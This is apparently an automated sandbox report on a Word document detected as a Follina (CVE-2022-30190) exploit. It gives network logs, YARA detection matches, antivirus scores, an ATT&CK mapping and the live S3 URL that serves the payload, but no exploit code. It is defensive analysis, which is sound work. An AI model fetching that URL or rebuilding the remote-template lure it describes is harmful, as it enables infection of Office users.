Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443

Source: global traffic	HTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comIf-Modified-Since: Sat, 28 May 2022 14:15:08 GMTIf-None-Match: "bfbfa8fdda62476690c9077946372eaa"Connection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown	HTTPS traffic detected: 3.5.246.192:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 52.95.148.170:443 -> 192.168.2.22:49183 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	String found in binary or memory: https://sqdocs.s3.eu-west-2.am
Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	String found in binary or memory: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html
Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	String found in binary or memory: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.htmlyX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CFED663A-BFB4-4992-A74D-FB6645F47512}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: sqdocs.s3.eu-west-2.amazonaws.com

Source: global traffic	HTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: sqdocs.s3.eu-west-2.amazonaws.comIf-Modified-Since: Sat, 28 May 2022 14:15:08 GMTIf-None-Match: "bfbfa8fdda62476690c9077946372eaa"Connection: Keep-Alive

Source: unknown	HTTPS traffic detected: 3.5.244.102:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.22:49186 -> 3.5.244.102:443 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: document.xml.rels, type: SAMPLE

Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen

Source: sslproxydump.pcap, type: PCAP	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: sslproxydump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18

Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: icRTA4gcSe.docx	Virustotal: Detection: 47%
Source: icRTA4gcSe.docx	Metadefender: Detection: 28%
Source: icRTA4gcSe.docx	ReversingLabs: Detection: 61%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: icRTA4gcSe.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\icRTA4gcSe.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$RTA4gcSe.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5CBF.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winDOCX@1/18@7/3

Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html!

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	13 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
icRTA4gcSe.docx	48%	Virustotal		Browse
icRTA4gcSe.docx	29%	Metadefender		Browse
icRTA4gcSe.docx	62%	ReversingLabs	Document-Office.Exploit.CVE-2022-30190
icRTA4gcSe.docx	100%	Avira	W97M/Dldr.Agent.G1

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm	100%	Avira	JS/CVE-2022-30190.G

Source	Detection	Scanner	Label	Link
https://sqdocs.s3.eu-west-2.am	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-r-w.eu-west-2.amazonaws.com	3.5.244.102	true	false		high
sqdocs.s3.eu-west-2.amazonaws.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sqdocs.s3.eu-west-2.am	~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	true	Avira URL Cloud: safe	unknown
https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.htmlyX	~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.5.246.192	unknown	United States	16509	AMAZON-02US	false
3.5.244.102	s3-r-w.eu-west-2.amazonaws.com	United States	16509	AMAZON-02US	false
52.95.148.170	unknown	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	685945
Start date and time:	2022-08-18 01:54:42 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	icRTA4gcSe (renamed file extension from none to docx)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.expl.evad.winDOCX@1/18@7/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
s3-r-w.eu-west-2.amazonaws.com	dNa0Vm8dUH.exe	Get hash	malicious	Browse	52.95.143.2
	3S5Zo7xwFi.exe	Get hash	malicious	Browse	52.95.149.170
	WW03AnuYLT.exe	Get hash	malicious	Browse	52.95.149.146
	8b91c310c14c6e5bcb8e8538bf2f65ec8bedf2bbd9d02.exe	Get hash	malicious	Browse	52.95.144.22
